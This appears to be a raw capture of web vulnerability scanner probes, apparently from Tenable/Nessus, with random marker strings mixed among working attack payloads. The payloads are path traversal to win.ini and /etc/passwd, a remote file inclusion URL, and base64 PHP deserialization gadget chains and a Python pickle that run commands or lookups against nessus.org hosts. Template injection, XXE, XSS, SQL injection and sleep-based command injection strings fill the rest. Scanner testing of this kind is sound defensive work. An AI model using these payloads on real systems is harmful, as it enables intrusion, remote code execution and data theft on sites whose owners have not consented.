nessus_was_textrn8j51tw||type C:\Windows\win.ini
nessus_was_textloms86oa
nessus_was_textiuwi7eid
nessus_was_text7bsxybae
/../../../../../../../../../../windows/win.ini
nessus_was_text109ymdz1
nessus_was_textid879e00
nessus_was_textff2fquax
…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini
.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/passwd
nessus_was_textjz5b5uji
nessus_was_textzu6c6la5
https://rfi.nessus.org/rfi.txt
nessus_was_textu92cvbadrfi.nessus.org/rfi.txt
nessus_was_text38298mi9
nessus_was_text0z0kn78e
nessus_was_textwv9jnd5c
nessus_was_text7mwvw82o
nessus_was_textefqk4x7z
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6InZ1a2J3eHhvN3p0aGszbmlqYmJqdmtuN3hvcXpsZjRrMjdrd2tibWN2eWtocnprMzQzcnEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
nessus_was_text6d4cxfr9
nessus_was_text651tif9q
nessus_was_text5krrfd3m
YToyOntpOjc7Tzo2MDoiU3ltZm9ueVxDb21wb25lbnRcSHR0cEtlcm5lbFxEYXRhQ29sbGVjdG9yXER1bXBEYXRhQ29sbGVjdG9yIjo3OntzOjc6IgAqAGRhdGEiO2E6Mzp7aTowO2E6NDp7czo0OiJkYXRhIjtzOjE6IjEiO3M6NDoibmFtZSI7Tzo0MDoiU3ltZm9ueVxDb21wb25lbnRcRm9ybVxGb3JtRXJyb3JJdGVyYXRvciI6Mjp7czo0OiJmb3JtIjtOO3M6NDg6IgBTeW1mb255XENvbXBvbmVudFxGb3JtXEZvcm1FcnJvckl0ZXJhdG9yAGVycm9ycyI7YToxOntpOjA7Tzo0MDoiU3ltZm9ueVxDb21wb25lbnRcRm9ybVxGb3JtRXJyb3JJdGVyYXRvciI6Mjp7czo0OiJmb3JtIjtPOjQxOiJTeW1mb255XENvbXBvbmVudFxDYWNoZVxUcmFpdHNcUmVkaXNQcm94eSI6Mjp7czo0ODoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXFRyYWl0c1xSZWRpc1Byb3h5AHJlZGlzIjtzOjY3OiJjZDJiMm52cW42dXJhYnRqanJiM3p3MmYzZXk0bXhyaGhxbGh0YzRjd2NmYTdjbzcyZWthLndhcy5uZXNzdXMub3JnXyI7czo1NDoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXFRyYWl0c1xSZWRpc1Byb3h5AGluaXRpYWxpemVyIjtPOjM5OiJTeW1mb255XENvbXBvbmVudFxDb25zb2xlXEhlbHBlclxEdW1wZXIiOjE6e3M6NDg6IgBTeW1mb255XENvbXBvbmVudFxDb25zb2xlXEhlbHBlclxEdW1wZXIAaGFuZGxlciI7YToyOntpOjA7Tzo0NDoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIiOjM6e3M6NjE6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFByb3h5QWRhcHRlcgBjcmVhdGVDYWNoZUl0ZW0iO3M6MjoiZGQiO3M6NTU6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFByb3h5QWRhcHRlcgBuYW1lc3BhY2UiO3M6MDoiIjtzOjUwOiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbCI7Tzo0MzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxOdWxsQWRhcHRlciI6MTp7czo2MDoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcTnVsbEFkYXB0ZXIAY3JlYXRlQ2FjaGVJdGVtIjtzOjEzOiJnZXRob3N0YnluYW1lIjt9fWk6MTtzOjc6ImdldEl0ZW0iO319fXM6NDg6IgBTeW1mb255XENvbXBvbmVudFxGb3JtXEZvcm1FcnJvckl0ZXJhdG9yAGVycm9ycyI7YTowOnt9fX19czo0OiJmaWxlIjtzOjE6IjMiO3M6NDoibGluZSI7czoxOiI0Ijt9aToxO047aToyO047fXM6NzE6IgBTeW1mb255XENvbXBvbmVudFxIdHRwS2VybmVsXERhdGFDb2xsZWN0b3JcRHVtcERhdGFDb2xsZWN0b3IAc3RvcHdhdGNoIjtOO3M6NzY6IgBTeW1mb255XENvbXBvbmVudFxIdHRwS2VybmVsXERhdGFDb2xsZWN0b3JcRHVtcERhdGFDb2xsZWN0b3IAZmlsZUxpbmtGb3JtYXQiO047czo3MToiAFN5bWZvbnlcQ29tcG9uZW50XEh0dHBLZXJuZWxcRGF0YUNvbGxlY3RvclxEdW1wRGF0YUNvbGxlY3RvcgBkYXRhQ291bnQiO2k6MDtzOjczOiIAU3ltZm9ueVxDb21wb25lbnRcSHR0cEtlcm5lbFxEYXRhQ29sbGVjdG9yXER1bXBEYXRhQ29sbGVjdG9yAGlzQ29sbGVjdGVkIjtiOjA7czo3MzoiAFN5bWZvbnlcQ29tcG9uZW50XEh0dHBLZXJuZWxcRGF0YUNvbGxlY3RvclxEdW1wRGF0YUNvbGxlY3RvcgBjbG9uZXNDb3VudCI7aTowO3M6NzM6IgBTeW1mb255XENvbXBvbmVudFxIdHRwS2VybmVsXERhdGFDb2xsZWN0b3JcRHVtcERhdGFDb2xsZWN0b3IAY2xvbmVzSW5kZXgiO2k6MDt9aTo3O2k6Nzt9
nessus_was_text8u3wqybb
nessus_was_textzyjo7l8x
nessus_was_textlbhumufb
nessus_was_textqfk1dla1
nessus_was_textqpl1rcly
nessus_was_textcjnapsqb
nessus_was_textqhich86v
nessus_was_textxxxz1a2d
}}{{“tnbwas_eit6uMgKCDVB”+str(2435*5696)}}
{{variable.getClass().forName(‘java.net.InetAddress’).getByName(‘mydwljf7jznd6w7mxstrh5tkgzzqu3pc5potqz3ftm4hejjrvdbq’+’.was.nessus.org’)}}
foo.html
nessus_was_texthop18dtp”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIHJyYmw0cmEydjRidzRzZnpsNWI3bDV1dWYyb3dibnVrc2gyM2V2ZTR4Ym81amJ3Y3libmEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_textgex6mmrg
mdxtelecom.com.br@73fc2a27-216c-4de5-be27-ae14b531769c.com
nessus_was_textmtb23og9
nessus_was_textvh4xcrc5
nessus_was_textbidmcu41
<!DOCTYPE test []>&xxe;
nessus_was_textvb13x7uk
nessus_was_textbv65ryk2
Version:|Vendor:
nessus_was_textdiyb7bfg
nessus_was_text8us5899t
nessus_was_textj6xonl7q
window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()
wasxsscontext4d0z3s
nessus_was_textwpkt4ryq script:;tenable_wasscan_xss_in_element_event=73fc2a27-216c-4de5-be27-ae14b531769c//
https://xssrctTnNNdne.was.tenable.com
nessus_was_textt98iyvxi
abcd
nessus_was_textvmr1mvao
nessus_was_text16woebfa
nessus_was_texthh43z9fu
-1756
nessus_was_textz2yfaou4
-1839′ or ‘1839’=’1839
nessus_was_text46uzsg2h
-1839
10001839′ or ‘1839’=’1839
nessus_was_textztqj33e4
1′ limit 0, 1386 —
nessus_was_text5xuv2oro
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
nessus_was_textqefgsft1
10002
1 procedure analyse()– +
-1756′ or ‘1756’=’1756′ — +
nessus_was_text1936f9id
nessus_was_text611xsbhc
-1756
sleep 4
nessus_was_textahkd6zn6
`sleep 4`
nessus_was_text4ntn5szx
nessus_was_textkitrgrkl
||powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
sleep 4
nessus_was_text3u9kc7rr AND (SELECT 6936 FROM (SELECT(SLEEP(2)))IZCFr)
nessus_was_textbzgvoc8i” AND (SELECT 6936 FROM (SELECT(SLEEP(2)))IZCFr) AND “IZCFr”=”IZCFr
nessus_was_textqbtx3em4
nessus_was_text8381p54u
nessus_was_text7po6189a
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x5c,(BENCHMARK(2*7000000,MD5(1))))),1)– –
nessus_was_textajqnfiqm
nessus_was_text1setnes4
nessus_was_textp3vgc97q
nessus_was_text4wk1b4j5